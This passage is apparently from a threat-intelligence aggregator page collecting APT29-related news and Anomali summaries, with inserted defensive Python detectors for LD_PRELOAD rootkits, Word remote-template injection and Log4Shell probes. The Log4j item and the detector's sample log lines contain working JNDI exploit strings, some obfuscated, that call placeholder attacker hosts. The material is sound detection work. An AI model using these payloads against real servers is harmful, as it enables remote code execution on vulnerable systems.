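        "loader_patched": loader_is_patched(loader_bytes),
        "hidden_pids": sorted(hidden_pids(listed, alive)),
    }


# Constructed samples (not real artifacts) so the checks can be exercised offline.
SAMPLE_PRELOAD = "# libfakeroot is a known, benign user of this file\n/usr/lib/libfakeroot.so /tmp/.x/libevil.so\n"
SAMPLE_CLEAN_LOADER = b"\x7fELF" + b"\x00" * 16 + b"/etc/ld.so.preload\x00" + b"\x00" * 16
SAMPLE_PATCHED_LOADER = b"\x7fELF" + b"\x00" * 16 + b"/tmp/.x/ld.preload\x00" + b"\x00" * 16


def main():
    preload = open(PRELOAD_FILE).read() if os.path.exists(PRELOAD_FILE) else ""
    loader = open(LOADER_PATH, "rb").read() if os.path.exists(LOADER_PATH) else PRELOAD_LITERAL
    with open("/proc/sys/kernel/pid_max") as f:
        pid_max = int(f.read())
    findings = triage(preload, loader, listed_pids_from_proc(), alive_pids_by_probe(pid_max))
    findings["hidden_pids"] = [p for p in findings["hidden_pids"] if is_thread_group_leader(p) is not False]
    print(findings)


if __name__ == "__main__":
    main()
```

Run it as root, ideally from a statically linked Python or after copying the interpreter and its libc from known-good media: the checks are only as honest as the libc the script itself runs against. A non-empty preload_entries or a patched loader is the finding; hidden_pids is a lead to confirm with a raw disk or memory image.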
Trending Cyber News and Threat Intelligence
Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022)
CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022 (CVSSv3 score 9.8). By May 6, 2022, multiple researchers had developed proof-of-concept (PoC) exploits for CVE-2022-1388, and the first in-the-wild exploitation attempts were reported on May 8, 2022.
Analyst Comment: Update vulnerable F5 BIG-IP versions 13.x and later. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations are available: block iControl REST access through the self IP addresses and through the management interface, and modify the BIG-IP httpd configuration as F5 advises.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190
Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication
Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022)
Kaspersky researchers analyzed five Android trojans that secretly subscribe users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Play under different names. To avoid detection, the malicious functionality does not start until the trojan has checked that it is available in the store. The malicious payload is split into up to four files. It can block or substitute anti-fraud scripts and modify the X-Requested-With header in HTTP requests. Another Android malware involved in subscription fraud, the MobOk trojan, has additional functionality to bypass CAPTCHAs. MobOk was seen in a malicious app on Google Play, but its most common infection vector is being dropped by other trojans such as Triada.
Analyst Comment: Limit app installs to the official stores (Google Play for Android) and avoid new apps with a low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting an app permissions that are not crucial to its alleged function. Monitor your balance and subscription list.
MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565
Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH
Raspberry Robin Gets the Worm Early (published: May 5, 2022)
Since September 2021, Red Canary researchers have been monitoring Raspberry Robin, a new worm
2022-05-10T17:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moshen-dragon-abused-anti-virus-software-raspberry-robin-worm-jumps-from-usb-unc3524-uses-internet-of-things-to-steal-emails-and-more
Tags: Ransomware, Malware, Tool, Vulnerability, Threat. Actors: APT 29, APT 28.

knowbe4 - cybersecurity services
Cozy Bear Goes Typosquatting
Researchers at Recorded Future's Insikt Group warn that the Russian threat actor NOBELIUM (also known as APT29 or Cozy Bear) is using typosquatting domains to target the news and media industries with phishing pages.
2022-05-05T13:08:59+00:00 https://blog.knowbe4.com/cozy-bear-goes-typosquatting
Tags: Threat. Actors: APT 29.

TechRepublic - Security News US
Russian hacker group APT29 targeting diplomats
2022-05-03T15:43:28+00:00 https://www.techrepublic.com/article/russian-hacker-group-apt29-targeting-diplomats/
Actors: APT 29.

SecurityWeek - Security News
Russian Cyberspies Target Diplomats With New Malware
2022-05-03T10:08:45+00:00 https://www.securityweek.com/russian-cyberspies-target-diplomats-new-malware
Tags: Malware. Actors: APT 29.

Mandiant - Mandiant security blog
UNC3524: Eye Spy on Your Email
UPDATE (November 2022): We have merged UNC3524 with APT29. The UNC3524 activity described in this post is now attributed to APT29.
Since December 2019, Mandiant has observed advanced threat actors increase their investment in tools to facilitate bulk email collection from victim environments, especially as it relates to their support of suspected espionage objectives. Email messages and their attachments offer a rich source of information about an organization, stored in a centralized location for threat actors to collect. Most email systems, whether on-premises or in the cloud, offer
2022-05-02T09:30:00+00:00 https://www.mandiant.com/resources/blog/unc3524-eye-spy-email
Tags: Tool, Threat. Actors: APT 29.

Security Affairs - Security blog
Russia-linked APT29 targets diplomatic and government organizations
2022-05-02T05:34:39+00:00 https://securityaffairs.co/wordpress/130787/apt/apt29-targets-diplomats.html
Actors: APT 29.

The Hacker News - The Hacker News is a hacking news blog (surprising, right?)
Russian Hackers Targeting Diplomatic Entities in Europe, Americas, and Asia
2022-05-02T04:40:01+00:00 https://thehackernews.com/2022/05/russian-hackers-targeting-diplomatic.html
Tags: Threat. Actors: APT 29.

Mandiant - Mandiant security blog
Trello From the Other Side: Tracking APT29 Phishing Campaigns
Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29's efforts to evade detection through retooling and abuse of Atlassian's Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent
2022-04-28T12:00:00+00:00 https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns
Tags: Malware. Actors: APT 29.
Mandiant - Mandiant security blog
Assembling the Russian Nesting Doll: UNC2452 Merged into APT29
[…] the SolarWinds compromise in December 2020, is attributable to APT29. This conclusion matches attribution statements previously made by the U.S. Government that the SolarWinds supply chain compromise was carried out by APT29, a Russia-based espionage group assessed to be sponsored by the Russian Foreign Intelligence Service (SVR). Our assessment is based on first-hand data gathered by Mandiant and is the result of an extensive comparison and review of UNC2452 and our
2022-04-27T09:00:00+00:00 https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29
Actors: APT 29, SolarWinds.

knowbe4 - cybersecurity services
“Being Annoying” as a Social Engineering Approach in MFA Attacks
Attackers are spamming multifactor authentication (MFA) prompts in an attempt to irritate users into approving the login, Ars Technica reports. Both criminal and nation-state actors are using this technique. Researchers at Mandiant observed the Russian state-sponsored actor Cozy Bear launching repeated MFA prompts until the user accepted the request.
2022-04-18T12:42:15+00:00 https://blog.knowbe4.com/being-annoying-as-a-social-engineering-approach
Actors: APT 29.

Schneier on Security - American cryptographer and security researcher
Bypassing Two-Factor Authentication
increasingly popular: …some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection. […] Methods include: Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop. ...
2022-04-01T11:12:27+00:00 https://www.schneier.com/blog/archives/2022/04/bypassing-two-factor-authentication.html
Tags: Threat. Actors: APT 29.

Ars Technica - Risk Assessment Security Hacktivism
Leaked ransomware documents show Conti helping Putin from the shadows
2022-03-19T10:45:49+00:00 https://arstechnica.com/?p=1842163
Tags: Ransomware. Actors: APT 29.

Fortinet ThreatSignal - Hardware vendor
Additional Wiper Malware Deployed in Ukraine #CaddyWiper
2022-03-15T13:20:59+00:00 https://fortiguard.fortinet.com/threat-signal-report/4450
Tags: Malware, Threat. Actors: APT 29.

Anomali - Firm Blog
Anomali Threat Research Provides Russian Cyber Activity Dashboard
2022-02-25T00:05:00+00:00 https://www.anomali.com/blog/anomali-threat-research-provides-russian-cyber-activity-dashboard
Tags: Threat, Guideline. Actors: APT 29, APT 28.

Fortinet ThreatSignal - Hardware vendor
New Wiper Malware Discovered Targeting Ukrainian Interests
2022-02-23T18:34:00+00:00 https://fortiguard.fortinet.com/threat-signal-report/4425
Tags: Malware, Threat. Actors: APT 29.

The Hacker News - The Hacker News is a hacking news blog (surprising, right?)
Russian APT Hackers Used COVID-19 Lures to Target European Diplomats
2022-02-09T02:46:33+00:00 https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html
Tags: Threat. Actors: APT 29.

Anomali - Firm Blog
Anomali Cyber Watch: Conti Ransomware Attack, Iran-Sponsored APTs, New Android RAT, Russia-Sponsored Gamaredon, and More
Trending Cyber News and Threat Intelligence
New CapraRAT Android Malware Targets Indian Government and Military Personnel (published: February 7, 2022)
Trend Micro researchers have discovered a new remote access trojan (RAT) for Android, dubbed CapraRAT. CapraRAT is attributed to the advanced persistent threat (APT) group APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), believed to be a Pakistan-based group active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) with the Windows-targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown; however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it attempts to reach a command and control server and then begins stealing various data from the infected device.
Analyst Comment: It is important to obtain software only from the Google Play Store (for Android users) and to avoid installing software from unverified sources, because it is easier for malicious applications to get into third-party stores. Applications that ask for permissions outside of their normal functionality should be treated with suspicion, and the normal functionality of an application should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed on devices.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072
Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT
Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (published: February 3, 2022)
The Russia-sponsored cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group's primary tactic remains spearphishing emails with attachments that leverage remote templates and template injection, with a focus on Ukraine. These attachments are usually Microsoft Word documents that use a remote template to fetch VBScript, execute it to establish persistence, and wait for the group's instructions from a command and control server. Unit 42 researchers have analyzed the group's activity and infrastructure from 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis.
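Added example for the Gamaredon item above (editor's code, not Unit 42's or Anomali's): a scanner for the remote-template mechanism that item describes. A .docx is a zip of XML parts, and Word learns where the attached template lives from a Relationship element in word/_rels/settings.xml.rels; template injection simply points that relationship at an attacker-hosted .dotm instead of a local path, so the document itself carries no macro to detect. The scanner lists every external relationship in the package and flags the kinds that make Word fetch and run remote content when their target is off-host. The minimal document it builds is constructed for the demonstration, and example.invalid is a placeholder host.

```python
"""Flag remote-template (and similar) external relationships in a .docx.
Editor's added example; uses only the standard library. On untrusted input,
parse with defusedxml rather than xml.etree to avoid XML bomb tricks."""
import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship kinds Word resolves automatically and that can execute or render remote content.
RISKY_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}


def is_remote_target(target):
    """True for http(s)/ftp URLs, UNC paths and file:// URLs that name a host.
    A legitimate attached template is a local path such as file:///C:/.../Normal.dotm."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    if scheme in {"http", "https", "ftp"}:
        return True
    return scheme == "file" and bool(parts.netloc)


def external_relationships(docx_bytes):
    """Every Relationship with TargetMode="External", from all .rels parts."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                found.append({"part": name,
                              "type": rel.get("Type", "").rsplit("/", 1)[-1],
                              "target": rel.get("Target", "")})
    return found


def remote_template_findings(docx_bytes):
    """External relationships of a risky kind whose target is off-host."""
    return [f for f in external_relationships(docx_bytes)
            if f["type"] in RISKY_TYPES and is_remote_target(f["target"])]


def _rels(*items):
    body = "".join(
        f'<Relationship Id="rId{i}" Type="{OFFICE_REL}{kind}" Target="{target}"'
        + (' TargetMode="External"' if external else "") + "/>"
        for i, (kind, target, external) in enumerate(items, 1))
    return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">{body}</Relationships>'


def build_sample_docx(template_target):
    """Constructed minimal document: one attachedTemplate relationship pointing at
    template_target, plus a benign external hyperlink that must not be flagged."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    parts = {
        "[Content_Types].xml": '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>',
        "_rels/.rels": _rels(("officeDocument", "word/document.xml", False)),
        "word/document.xml": f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<w:document xmlns:w="{w_ns}"><w:body><w:p/></w:body></w:document>',
        "word/_rels/document.xml.rels": _rels(("settings", "settings.xml", False),
                                              ("hyperlink", "https://example.invalid/", True)),
        "word/settings.xml": f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<w:settings xmlns:w="{w_ns}" xmlns:r="{OFFICE_REL[:-1]}">'
            f'<w:attachedTemplate r:id="rId1"/></w:settings>',
        "word/_rels/settings.xml.rels": _rels(("attachedTemplate", template_target, True)),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_docx("http://example.invalid/lure.dotm")
    print(remote_template_findings(lure))
```

Pointing the scanner at a mail gateway's attachment stream gives a cheap, macro-independent signal; the same loop also catches external oleObject and frame relationships, which are the next tricks in the same family. Legitimate documents do reference local templates, so the test is the target's location, not the presence of the relationship.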
Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis
2022-02-08T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-conti-ransomware-attack-iran-sponsored-apts-new-android-rat-russia-sponsored-gamaredon-and-more
Tags: Ransomware, Malware, Threat, Conference. Actors: APT 35, APT 29, APT 36.

Bleeping Computer - American magazine
Russian APT29 hackers' stealthy malware undetected for years
2022-01-27T09:23:25+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-stealthy-malware-undetected-for-years/
Tags: Malware. Actors: APT 29.

CrowdStrike - CTI Society
Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign
2022-01-27T08:00:06+00:00 https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
Actors: APT 29, SolarWinds.

Anomali - Firm Blog
Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More
Trending Cyber News and Threat Intelligence
Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022)
The Earth Lusca threat group is part of the Winnti cluster, one of several Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs), including the use of Winnti malware. Earth Lusca was active throughout 2021, conducting both cyberespionage operations against government-connected organizations and financially motivated intrusions targeting the gambling and cryptocurrency sectors. For initial access the group uses several methods, including spearphishing, watering hole attacks, and exploitation of public-facing servers. Cobalt Strike is one of the group's preferred post-exploitation tools, followed by the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters: rented Vultr VPS servers used for command and control (C2), and compromised web servers used to scan for vulnerabilities, tunnel traffic, and host Cobalt Strike C2.
Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as not clicking on suspicious email or website links and not reacting to random banners urging you to update important public-facing applications. Don't be tricked into downloading an Adobe Flash update; Flash was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow
2022-01-19T22:45:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-sponsored-cyber-threats-china-based-earth-lusca-active-in-cyberespionage-and-cybertheft-bluenoroff-hunts-cryptocurrency-related-businesses-and-more
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Patching, Guideline. Actors: APT 38, APT 29, APT 28, APT 41.

Anomali - Firm Blog
Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, an open source Java logging library. The Apache Software Foundation (ASF) rates the vulnerability 10 on the Common Vulnerability Scoring System (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. The vulnerability affects millions of users, proof-of-concept exploit code exists, and LunaSec explains how to exploit it in five simple steps:
1. Data from the user gets sent to the server (via any protocol).
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
3. The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
4. The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class) which is injected into the server process.
5. This injected payload triggers a second stage and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 was released to address this vulnerability. It disables message lookups by default (the log4j2.formatMsgNoLookups behavior), so if that setting is turned back to false Log4j is exploitable again; the 2.15.0 fix was itself later found incomplete in some configurations (CVE-2021-45046, addressed in 2.16.0, with further hardening in 2.17.x), so upgrade to the latest 2.x release rather than relying on the property. The initial campaigns could have been detected by filtering on keywords such as "ldap" and "jndi", but that detection method is easily bypassed with nested lookups such as ${${lower:j}ndi:...}.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021)
Researchers from the DevOps firm JFrog have found at least 17 malicious packages on the open source npm registry for JavaScript.
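Added example for the Log4j item above (editor's code, not LunaSec's, Cisco Talos's or Anomali's): the item notes that a plain "jndi" keyword filter is easily bypassed, and this scanner shows why and what to do about it for hunting in logs. Log4j's lookup syntax lets an attacker spell the payload as nested lookups (${lower:j}, ${::-j}, ${env:NONE:-j}) that only become "jndi" once Log4j evaluates them. The scanner evaluates the lookup forms an attacker controls, URL-decodes first, and only then looks for a jndi: lookup. The access-log lines are constructed; attacker.example and the 203.0.113.0/24 addresses are placeholders. This is detection, not mitigation: it handles the lower/upper/default-value lookups, not every lookup Log4j supports, so the fix remains the upgrade.

```python
"""Obfuscation-aware Log4Shell probe detector (editor's added example)."""
import re
from urllib.parse import unquote

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")       # innermost ${...}, no nested braces
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body):
    """Evaluate one lookup body the way Log4j's Interpolator would for the
    forms an attacker can control. None means 'cannot resolve, keep literal'."""
    if ":-" in body:                     # ${key:-default}: the default is the value
        return body.split(":-", 1)[1]
    key, _, rest = body.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    return None                          # jndi, env without default, date, ...


def _collapse(match):
    resolved = _resolve(match.group(1))
    return match.group(0) if resolved is None else resolved


def normalize_lookups(text, max_rounds=32):
    """URL-decode, then repeatedly collapse innermost resolvable lookups.
    Unresolvable lookups stay literal, so ${jndi:...} survives to be matched."""
    for _ in range(3):                   # undo (possibly repeated) URL encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(_collapse, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_probe(text):
    return JNDI_LOOKUP.search(normalize_lookups(text)) is not None


def naive_keyword_hits(lines):
    """What a literal 'jndi' filter would flag (1-based line numbers)."""
    return [i for i, line in enumerate(lines, 1) if "jndi" in line.lower()]


def normalized_hits(lines):
    """What the lookup-aware check flags (1-based line numbers)."""
    return [i for i, line in enumerate(lines, 1) if is_jndi_probe(line)]


# Constructed web-server access log lines: the User-Agent and request path
# are the usual places the payload lands because both end up in a log call.
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://attacker.example/a}"',
    '203.0.113.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [10/Dec/2021:10:00:05 +0000] "GET /%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 "-" "-"',
]

if __name__ == "__main__":
    print("keyword filter:", naive_keyword_hits(SAMPLE_LINES))
    print("lookup-aware:  ", normalized_hits(SAMPLE_LINES))
    for n in normalized_hits(SAMPLE_LINES):
        print(n, normalize_lookups(SAMPLE_LINES[n - 1]).split('"')[-2])
```

The keyword filter flags only the first line; the lookup-aware check flags lines 1, 2, 3 and 5 and leaves the browser User-Agent alone. Because the normalizer is a pure function over a string, the same routine can be dropped into a SIEM parser or run over a proxy log archive to find probes that predate the patch.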
The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None Security Affairs - Blog Secu Nobelium continues to target organizations worldwide with custom malware 2021-12-07T07:54:37+00:00 https://securityaffairs.co/wordpress/125352/apt/nobelium-custom-malware.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-custom-malware www.secnews.physaphae.fr/article.php?IdArticle=3755876 False Malware,Threat APT 29 None Security Affairs - Blog Secu Nobelium APT targets French orgs, French ANSSI agency warns 2021-12-06T22:31:02+00:00 https://securityaffairs.co/wordpress/125342/apt/nobelium-targets-french-orgs.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-targets-french-orgs www.secnews.physaphae.fr/article.php?IdArticle=3754433 False None APT 29 None Mandiant - Blog Sécu de Mandiant Activité russe présumée ciblant le gouvernement et les entités commerciales du monde entier<br>Suspected Russian Activity Targeting Government and Business Entities Around the Globe fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29. 
UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by
Published 2021-12-06T10:00:00+00:00. Source: https://www.mandiant.com/resources/blog/russian-targeting-gov-business Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=8377522 Tags: Threat; APT 29, SolarWinds
Anomali - Firm Blog: Anomali Cyber Watch: Russian Intelligence Targets IT Providers, Malspam Abuses Squid Games, Another npm Library Compromise, and More
[Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.]
Trending Cyber News and Threat Intelligence
BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021)
Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware, the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server as fast as possible, prior to deployment of the ransomware. The speed is achieved via multiple filtering mechanisms: a directory exclusion list, a filetype whitelist, exclusion of files under 1,024 bytes, exclusion of files with certain attributes, and a filename string exclusion list. Exmatter is under active development: three newer versions have been found in the wild.
Analyst Comment: BlackMatter's Exmatter exfiltration tool follows two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. This makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation.
MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048
Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention
Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021)
Iranian General Gholamreza Jalali, head of Iran's passive defense organization, went on state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled the government-issued electronic subsidy cards that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran's rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting the Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei.
Analyst Comment: Iran has not provided evidence behind the attribution, so
Published 2021-11-02T15:00:00+00:00. Source: https://www.anomali.com/blog/anomali-cyber-watch-russian-intelligence-targets-it-providers-malspam-abuses-squid-games-another-npm-library-compromise-and-more Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=3598623 Tags: Ransomware, Malware, Tool, Threat, Guideline; APT 29

Security Affairs - Blog Secu: Russia-linked Nobelium APT targets orgs in the global IT supply chain
Published 2021-10-25T11:41:33+00:00. Source: https://securityaffairs.co/wordpress/123754/apt/nobelium-apt-it-supply-chain.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-apt-it-supply-chain Aggregator: www.secnews.physaphae.fr/article.php?IdArticle=3559032 Tags: APT 29